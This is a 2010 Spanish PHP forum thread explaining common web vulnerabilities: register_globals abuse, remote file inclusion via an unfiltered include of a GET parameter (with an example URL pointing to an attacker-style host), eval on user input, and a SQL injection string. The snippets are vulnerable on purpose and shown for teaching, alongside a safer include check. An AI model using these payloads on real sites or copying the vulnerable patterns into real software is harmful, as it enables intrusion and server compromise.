Seguridad php que no sea por sql

iLeaz · #1 (**permalink**) 01/01/2010, 17:15

hola, alguien podría decirme cuales son los pasos para hacer una web segura en el aspecto de la arquitectura?

osea no la parte que involucra sql sino la parte de la prrotección de variables en los IF ELSE etc... es que vi un artículo de un blog y no me quedó claro como pueden hackearte poniendo /=variable en la url... xd

Agradezco la colaboración :D

Yefb · #2 (**permalink**) 01/01/2010, 17:26

Simplemente nunca dependas de las variables globales para trabajar, pues son inseguras.
Para pasar variables debes usar los arrays SUPERGLOBALES.
Quizá no me entenderás del todo, pero te recomiendo que te documentes un poco sobre php, en especial en esa parte del porqué no debes usar "register_globals".
Ésta y otras indicaciones de seguridad son importantes, pero la más imprescindible es que aprendas a programar.
Saludos!

iLeaz · #3 (**permalink**) 01/01/2010, 17:28

lo de register_globals creo que lo tiene marcado a fuego cualquiera que posetee 2 veces en este foro jajaja

pero digo... osea si no las uso no hay forma de que me hagan "truquitos" en la estructura de la web?

yo se programar... pero me voy mucho por la funcionalidad y nunca tuve problemas de seguridad jaja asi que algo debe andar mal xD

pato12 · #4 (**permalink**) 01/01/2010, 17:30

Bueno, hay muchos metodos de hackeo XD
- El de injecsion SQL.. (ya lo deves saber :p)

- El de subir archivos... si no verificas bien los datos que el usuario sube, te pueden meter algun virus o un archivo .php y lo ejecutan xD

- El del get (o modulos)... a mi me hackearon 2 veses por ese metodo, mira te explico. Si haces asi para tus modulos (como solia hacer yo):

Código PHP:

Ver original$id=$_GET['id'];
include("{$id}.php");

entonces, alguien hizo: index.php?id=http://www.web_que_ataca.com/archivo_para_infectar
y se va a ejecutar en mi servidor. Asi me infectaron todos mis archivos XD
por ese es bueno poner asi:

Código PHP:

Ver original$id=$_GET['id']; // Algunos filtros aqui....
if(file_exists("./modulos/{$id}.php"))
include("./modulos/{$id}.php");
else
die('El modulo no existe!..');

y otra cosa... no uses $_GET[ALGO AQUI] o $_POST[ALGO AQUI]... si no gurdalas en una variable y filtradas.

Despues deven aver otro metodos de hackeo, pero no conosco :p
Suerte
Salu2

pateketrueke · #5 (**permalink**) 01/01/2010, 17:35

bien, de lo que hablas es SQL Injection... que es una forma de "evaluar" la entrada, como si fuera una consulta de SQL natural...

también puede hacerse en cualquier lenguaje, tan simple como:

foo.php?exec=die(phpversion())

Código PHP:

  eval($_GET['exec']);

...o, así pasa con SQL(+PHP)

Código PHP:

  $name = "' OR 1=1 AND NULL = '"; 
$sql = "SELECT * FROM users WHERE nick = '$name'"; 
// SELECT * FROM users WHERE nick = '' OR 1=1 AND NULL = ''

de forma inexplicable, ahí debe notarse el ¿porque? de las inyecciones de SQL ... de veras!!

Vamos, no hablas de SQL... pero en PHP es la misma tontería

index.php?seccion=index

Código PHP:

  include_once $_GET['seccion'] . '.php';

hay que analizar el ejemplo.... ¿que sucede?
R: recursion
...

iLeaz · #6 (**permalink**) 01/01/2010, 17:36

Muchas gracias por los datos! sigan si pueden jeje

pateketrueke sisi entendí tu concepto, creo que lo estoy haciendo bien por ahora ^^

osea en cuanto a la limpieza de las variables al momento de ejecutar consultas lo tengo bien claro.
El sistema de gets también, es más lo he desarrollado batante sin saberlo jaja

Peor vieron esos casos en que dicen que si no creas la variable antes del if es como que peuden definirla ellos agregando cadenas en la url o no se que...

osea que el hacker puede decidir el valor de la variable aunque esta no sea GET... nose como es el tema...

Acron_0248 · #7 (**permalink**) 01/01/2010, 23:36

Cita:

Iniciado por iLeaz

Peor vieron esos casos en que dicen que si no creas la variable antes del if es como que peuden definirla ellos agregando cadenas en la url o no se que...

osea que el hacker puede decidir el valor de la variable aunque esta no sea GET... nose como es el tema...

Mucho mejor si das el enlace al artículo para entender qué te están diciendo, pero por lo que leo, pareciera que te hablan de algo que ya te han dicho acá, register_globals

Básicamente, si register_globals está activo, una variable recibida por get, post, cookie, environment o server, tomaría un valor que podría usarse para saltarse una validación aunque dicha variable no haya sido definida en el script antes de una validación

Este es un típico ejemplo de ello:

Tienes la url http://sitio.com/login.php?admin=1

En el código de login.php tienes:

Código PHP:

  if ( isset($_POST['password']) && !empty($_POST['password']) ) { 
  $admin = true; 
}

El problema allí, aunque la validación regrese falso (la clave no se envió o la clave está vacía), es que $admin será true, no porque se haya hecho con el código, sino porque desde la URL y debido a register_globals habilitado, se logró definir $admin = 1; lo que claro, convierte $admin en true a ojos del intérprete cuando vaya a ser utilizado nuevamente.

Eso es lo más cercano que conozco a definir valores desde una url que puedan comprometer luego alguna validación hecha por un script. Al menos en base a lo que dices